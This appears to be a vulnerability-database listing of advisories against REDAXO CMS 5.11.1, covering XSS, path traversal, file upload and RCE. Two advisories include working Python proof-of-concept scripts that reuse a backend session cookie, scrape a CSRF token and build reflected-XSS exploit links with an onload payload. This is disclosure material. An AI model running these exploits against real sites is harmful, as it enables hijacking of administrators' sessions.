Search for packages
| purl | pkg:composer/redaxo/source@5.11.1 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-43rj-4gkz-nkh9
Aliases: CVE-2025-27411 GHSA-wppf-gqj5-fc4f |
REDAXO is a PHP-based CMS. In Redaxo before 5.18.3, the mediapool/media page is vulnerable to arbitrary file upload. This vulnerability is fixed in 5.18.3. |
Affected by 6 other vulnerabilities. |
|
VCID-6khs-z7j6-t3d5
Aliases: CVE-2026-21857 GHSA-824x-88xg-cwrv |
REDAXO is a PHP-based content management system. Prior to version 5.20.2, authenticated users with backup permissions can read arbitrary files within the webroot via path traversal in the Backup addon's file export functionality. The Backup addon does not validate the `EXPDIR` POST parameter against the UI-generated allowlist of permitted directories. An attacker can supply relative paths containing `../` sequences (or even absolute paths inside the document root) to include any readable file in the generated `.tar.gz` archive. Version 5.20.2 fixes this issue. |
Affected by 2 other vulnerabilities. |
|
VCID-9tsa-vfy2-4ye8
Aliases: CVE-2024-50803 GHSA-m5vv-7jxc-8p6x |
The mediapool feature of the Redaxo Core CMS application v 5.17.1 is vulnerable to Cross Site Scripting(XSS) which allows a remote attacker to escalate privileges |
Affected by 9 other vulnerabilities. |
|
VCID-a7bz-5fnn-27bn
Aliases: CVE-2024-25298 GHSA-7f2v-5877-rx3x |
An issue was discovered in REDAXO version 5.15.1, allows attackers to execute arbitrary code and obtain sensitive information via modules.modules.php. |
Affected by 12 other vulnerabilities. |
|
VCID-cvjn-52xx-t7af
Aliases: CVE-2025-64049 GHSA-vqc7-7fj4-3fm3 |
A stored cross-site scripting (XSS) vulnerability in the module management component in REDAXO CMS 5.20.0 allows remote users to inject arbitrary web script or HTML via the Output code field in modules. The payload is executed when a user views or edits an article by adding slice that uses the compromised module. |
Affected by 3 other vulnerabilities. |
|
VCID-g2uw-4bc8-c7hz
Aliases: GHSA-m662-8jrj-cw6v |
REDAXO has reflected XSS in backend Metainfo API via type parameter (CSRF token required) ### Summary A **reflected XSS** vulnerability has been identified in the REDAXO backend. The `type` parameter is concatenated into an API error message and rendered without HTML escaping. --- ### Details **Root cause** User input `type` is injected into an exception message, then rendered by `rex_view::error()` which delegates to `rex_view::message()` without HTML escaping. **Vulnerable code (`redaxo/src/addons/metainfo/lib/handler/api_default_fields.php`) :** ```php $type = rex_get('type', 'string'); throw new rex_api_exception(sprintf('metainfo type "%s" does not have default field.', $type)); ``` **Sink (`redaxo/src/core/lib/view.php`) :** ```php return '<div class="' . $cssClassMessage . '">' . $message . '</div>'; ``` **Data flow source -> sink** - Source : `type` (GET) - Propagation : concatenated into the exception message - Sink : rendered via `rex_view::error()` -> `rex_view::message()` without escaping **Authentication required :** yes (backend session) --- ### PoC - exploit ```python #!/usr/bin/env python3 import re import urllib.parse import requests TARGET_URL = "http://poc.local/" BACKEND_PATH = "redaxo/index.php" SESSION_ID = "xxxxxxxxxxxxxxxxxxxxx" VERIFY_SSL = False TIMEOUT = 15 PAYLOAD = '\"><svg/onload=alert("pwned")>' def build_backend_url() -> str: base = TARGET_URL.rstrip("/") return f"{base}/{BACKEND_PATH.lstrip('/')}" def extract_api_csrf(html_text: str) -> str: m = re.search(r'rex-api-call=metainfo_default_fields_create[^"\']+', html_text) if not m: raise RuntimeError("Could not find the metainfo_default_fields_create API link in the page HTML.") fragment = m.group(0).replace("&", "&") token_match = re.search(r"_csrf_token=([^&]+)", fragment) if not token_match: raise RuntimeError("CSRF token for metainfo_default_fields_create was not found in the extracted link.") return token_match.group(1) def set_session_cookie(session: requests.Session) -> None: parsed = urllib.parse.urlparse(TARGET_URL) if parsed.hostname: session.cookies.set("PHPSESSID", SESSION_ID, domain=parsed.hostname, path="/") def main() -> None: backend_url = build_backend_url() s = requests.Session() set_session_cookie(s) # Admin backend session required r0 = s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL) if "rex-page-login" in r0.text or "rex_user_login" in r0.text: print("[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.") return r = s.get(backend_url, params={"page": "metainfo/articles"}, timeout=TIMEOUT, verify=VERIFY_SSL) if r.status_code != 200: print(f"[!] Failed to access metainfo page (HTTP {r.status_code}).") return api_token = extract_api_csrf(r.text) params = { "page": "metainfo/articles", "rex-api-call": "metainfo_default_fields_create", "type": PAYLOAD, "_csrf_token": api_token, } exploit_url = f"{backend_url}?{urllib.parse.urlencode(params)}" print(exploit_url) if __name__ == "__main__": main() ``` The script uses only the provided PHPSESSID, retrieves the CSRF token from the metainfo page, and prints a ready-to-use exploit link. --- ### Impact - **Confidentiality :** Low : no direct session theft (HttpOnly cookies), but possibility to access/exfiltrate data available via the DOM or via same-origin requests if the XSS executes in a victim’s session. - **Integrity :** Low : possibility to chain backend actions on behalf of the user (same-origin requests) only if execution takes place in a victim session; otherwise the impact is limited to the user who triggers the call. - **Availability :** Low : the XSS could disrupt the administration interface or trigger unwanted actions, but the token requirement strongly limits realistic scenarios. ### Video https://github.com/user-attachments/assets/251f548c-3f68-483b-a012-b8fc28493a83 |
Affected by 0 other vulnerabilities. |
|
VCID-hb2z-pwuj-qyax
Aliases: CVE-2025-27412 GHSA-8366-xmgf-334f |
REDAXO is a PHP-based CMS. In Redaxo from 5.0.0 through 5.18.2, the rex-api-result parameter is vulnerable to Reflected cross-site scripting (XSS) on the page of AddOns. This vulnerability is fixed in 5.18.3. |
Affected by 6 other vulnerabilities. |
|
VCID-kqky-74hg-fkc6
Aliases: CVE-2024-46209 GHSA-2p95-8xvm-2pjx |
A stored cross-site scripting (XSS) vulnerability in the component /media/test.html of REDAXO CMS v5.17.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the password parameter. |
Affected by 9 other vulnerabilities. |
|
VCID-vbpx-vpps-q7g2
Aliases: CVE-2025-66026 GHSA-x6vr-q3vf-vqgq |
REDAXO is a PHP-based CMS. Prior to version 5.20.1, a reflected Cross-Site Scripting (XSS) vulnerability exists in the Mediapool view where the request parameter args[types] is rendered into an info banner without HTML-escaping. This allows arbitrary JavaScript execution in the backend context when an authenticated user visits a crafted link while logged in. This issue has been patched in version 5.20.1. |
Affected by 3 other vulnerabilities. |
|
VCID-wj2a-1yb5-tyde
Aliases: CVE-2025-64050 GHSA-xj9j-gjxg-7jvq |
A Remote Code Execution (RCE) vulnerability in the template management component in REDAXO CMS 5.20.0 allows remote authenticated administrators to execute arbitrary operating system commands by injecting PHP code into an active template. The payload is executed when visitors access frontend pages using the compromised template. |
Affected by 3 other vulnerabilities. |
|
VCID-wrm2-fcq1-aqfj
Aliases: CVE-2024-46212 GHSA-37gm-h5wr-pf25 |
An issue in the component /index.php?page=backup/export of REDAXO CMS v5.17.1 allows attackers to execute a directory traversal. | There are no reported fixed by versions. |
|
VCID-zngq-agvt-dfa4
Aliases: GHSA-xq4j-g85q-wf97 |
REDAXO has reflected XSS backend packages API via function parameter (CSRF token required) ### Summary A **reflected XSS** vulnerability has been identified in the REDAXO backend. The `function` parameter is concatenated into an API error message and rendered without HTML escaping. --- ### Details **Root cause** User input `function` is injected into an exception message, then rendered by `rex_view::error()` which delegates to `rex_view::message()` without HTML escaping. **Vulnerable code (`redaxo/src/core/lib/packages/api_package.php`) :** ```php $function = rex_request('function', 'string'); throw new rex_api_exception('Unknown package function "' . $function . '"!'); ``` **Sink (`redaxo/src/core/lib/view.php`) :** ```php return '<div class="' . $cssClassMessage . '">' . $message . '</div>'; ``` **Source -> sink flow** * Source: `function` (GET) * Propagation: concatenated into the exception message * Sink: rendered via `rex_view::error()` -> `rex_view::message()` without escaping **Authentication required:** yes (backend session) --- ### PoC - Exploit ```python #!/usr/bin/env python3 import re import urllib.parse import requests TARGET_URL = "http://poc.local/" BACKEND_PATH = "redaxo/index.php" # A valid backend PHP session id (must belong to a user who can access the Packages page) SESSION_ID = "xxxxxxxxxxxxxxxxxxxxx https://github.com/user-attachments/assets/94093253-abd6-4380-ad46-6b748541a598 " VERIFY_SSL = False TIMEOUT = 15 PAYLOAD = '\\"><svg/onload=alert("Pwned")>' def build_backend_url() -> str: base = TARGET_URL.rstrip('/') return f"{base}/{BACKEND_PATH.lstrip('/')}" def extract_api_csrf(html_text: str) -> str: m = re.search(r'rex-api-call=package[^\"]+_csrf_token=([^&\"\s]+)', html_text) if not m: raise RuntimeError("CSRF token for rex_api_call=package was not found in the page HTML.") return m.group(1) def set_session_cookie(session: requests.Session) -> None: parsed = urllib.parse.urlparse(TARGET_URL) if parsed.hostname: session.cookies.set("PHPSESSID", SESSION_ID, domain=parsed.hostname, path="/") def main() -> None: backend_url = build_backend_url() s = requests.Session() set_session_cookie(s) # Backend session required (role with access to packages) r0 = s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL) if "rex-page-login" in r0.text or "rex_user_login" in r0.text: print("[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.") return r = s.get(backend_url, params={"page": "packages"}, timeout=TIMEOUT, verify=VERIFY_SSL) if r.status_code != 200: print(f"[!] Failed to access packages page (HTTP {r.status_code}).") return api_token = extract_api_csrf(r.text) params = { "page": "packages", "rex-api-call": "package", "function": PAYLOAD, "package": "nonexistent", "_csrf_token": api_token, } exploit_url = f"{backend_url}?{urllib.parse.urlencode(params)}" print(exploit_url) if __name__ == "__main__": main() ``` To run the PoC you must set a valid admin account PHPSSID. The PoC will then automatically retrieve the CSRF token and generate a ready-to-use exploitation link. --- ### Impact * **Confidentiality:** Low : no direct session theft (HttpOnly cookies), but possibility to access/exfiltrate data available via the DOM or via same-origin requests if the XSS executes in a victim’s session. * **Integrity:** Low : possibility to chain backend actions on behalf of the user (same-origin requests) only if execution takes place in a victim session; otherwise the impact is limited to the user who triggers the call. * **Availability:** Low : the XSS could disrupt the administration interface or trigger unwanted actions, but the token requirement strongly limits realistic scenarios. ### Demo https://github.com/user-attachments/assets/41d0186a-7ca0-4482-86c5-8bea6c8f6ac6 |
Affected by 0 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||